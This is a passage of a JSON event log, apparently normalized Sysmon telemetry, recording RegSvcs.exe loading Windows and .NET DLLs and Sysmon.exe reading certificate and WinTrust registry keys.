"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "wow64cpu.dll", - "image_path": "C:\\Windows\\System32\\wow64cpu.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "mscoree.dll", - "image_path": 
"C:\\Windows\\SysWOW64\\mscoree.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": 
"{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "mscoreei.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", - "pid": 1976, - "process_name": 
"RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\SysWOW64\\combase.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": 
"user32.dll", - "image_path": "C:\\Windows\\SysWOW64\\user32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\SysWOW64\\win32u.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\SysWOW64\\version.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "clr.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 
131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcr120_clr0400.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcr120_clr0400.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll", - "registry_value": "clr.dll", - "timestamp": 131883570871210000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll\\\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework\\v4.0.30319", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll\\\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "registry_value": "RegSvcs.exe", - "timestamp": 131883570871210000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "image_load", - "image_name": "mscorlib.ni.dll", - "image_path": "C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\6715dc4d04e35f16d482900c355325e9\\mscorlib.ni.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - 
"timestamp": 131883570871210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "clrjit.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\SysWOW64\\oleaut32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "System.EnterpriseServices.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "System.EnterpriseServices.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - 
"timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871360000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - 
"registry_value": "Software Publishing", - "timestamp": 131883570871520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871520000, - "unique_pid": 